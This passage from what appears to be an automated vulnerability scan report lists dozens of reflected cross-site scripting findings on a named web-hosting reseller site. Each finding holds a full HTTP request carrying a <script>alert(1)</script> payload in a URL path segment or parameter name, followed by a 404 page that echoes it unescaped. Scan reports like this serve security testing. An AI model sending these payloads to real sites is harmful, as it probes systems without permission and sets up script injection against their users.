The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 22bbe<script>alert(1)</script>3b9d7f01149 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting22bbe<script>alert(1)</script>3b9d7f01149/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting22bbe<script>alert(1)</script>3b9d7f01149/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.5517. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 88cd2<script>alert(1)</script>f8cb615632b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes88cd2<script>alert(1)</script>f8cb615632b/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes88cd2<script>alert(1)</script>f8cb615632b/kosmos/ was not found on this server.</p>
...[SNIP]...

2.5518. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d55fc<script>alert(1)</script>14e68ab6ef7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmosd55fc<script>alert(1)</script>14e68ab6ef7/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmosd55fc<script>alert(1)</script>14e68ab6ef7/ was not found on this server.</p>
...[SNIP]...

2.5519. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 13177<script>alert(1)</script>161e46cc43d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/?13177<script>alert(1)</script>161e46cc43d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/?13177<script>alert(1)</script>161e46cc43d=1 was not found on this server.</p>
...[SNIP]...

2.5520. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bdd50<script>alert(1)</script>c85ea76de8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicebdd50<script>alert(1)</script>c85ea76de8/web-hosting/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicebdd50<script>alert(1)</script>c85ea76de8/web-hosting/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.5521. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5bc68<script>alert(1)</script>a1203984585 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting5bc68<script>alert(1)</script>a1203984585/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting5bc68<script>alert(1)</script>a1203984585/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.5522. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 68de2<script>alert(1)</script>2ab03ca16bf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes68de2<script>alert(1)</script>2ab03ca16bf/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes68de2<script>alert(1)</script>2ab03ca16bf/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.5523. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f34bf<script>alert(1)</script>61d1657f49c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmosf34bf<script>alert(1)</script>61d1657f49c/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmosf34bf<script>alert(1)</script>61d1657f49c/images/ was not found on this server.</p>
...[SNIP]...

2.5524. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 999a4<script>alert(1)</script>f62e1399db9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images999a4<script>alert(1)</script>f62e1399db9/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images999a4<script>alert(1)</script>f62e1399db9/ was not found on this server.</p>
...[SNIP]...

2.5525. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 66645<script>alert(1)</script>11be44aab0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/?66645<script>alert(1)</script>11be44aab0d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/?66645<script>alert(1)</script>11be44aab0d=1 was not found on this server.</p>
...[SNIP]...

2.5526. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/folder.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5b642<script>alert(1)</script>55aa7b48e2b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service5b642<script>alert(1)</script>55aa7b48e2b/web-hosting/themes/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service5b642<script>alert(1)</script>55aa7b48e2b/web-hosting/themes/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.5527. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/folder.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 32ab2<script>alert(1)</script>35927758278 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting32ab2<script>alert(1)</script>35927758278/themes/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting32ab2<script>alert(1)</script>35927758278/themes/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.5528. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/folder.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f5788<script>alert(1)</script>22abe3a960b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themesf5788<script>alert(1)</script>22abe3a960b/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themesf5788<script>alert(1)</script>22abe3a960b/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.5529. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/folder.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7f709<script>alert(1)</script>50d7bab0f7a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos7f709<script>alert(1)</script>50d7bab0f7a/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos7f709<script>alert(1)</script>50d7bab0f7a/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.5530. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/folder.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f7438<script>alert(1)</script>319020e45a4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/imagesf7438<script>alert(1)</script>319020e45a4/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/imagesf7438<script>alert(1)</script>319020e45a4/folder.gif was not found on this server.</p>
...[SNIP]...

2.5531. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/folder.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e07d7<script>alert(1)</script>3c0d83bda41 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/folder.gife07d7<script>alert(1)</script>3c0d83bda41 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/folder.gife07d7<script>alert(1)</script>3c0d83bda41 was not found on this server.</p>
...[SNIP]...

2.5532. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/folder.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/folder.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f44c0<script>alert(1)</script>21e005d027b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/folder.gif?f44c0<script>alert(1)</script>21e005d027b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/folder.gif?f44c0<script>alert(1)</script>21e005d027b=1 was not found on this server.</p>
...[SNIP]...

2.5533. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 409cc<script>alert(1)</script>0c0666c6a3d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service409cc<script>alert(1)</script>0c0666c6a3d/web-hosting/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service409cc<script>alert(1)</script>0c0666c6a3d/web-hosting/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5534. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 78b74<script>alert(1)</script>2ee06c88887 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting78b74<script>alert(1)</script>2ee06c88887/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting78b74<script>alert(1)</script>2ee06c88887/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5535. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7bab5<script>alert(1)</script>dcad761b354 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

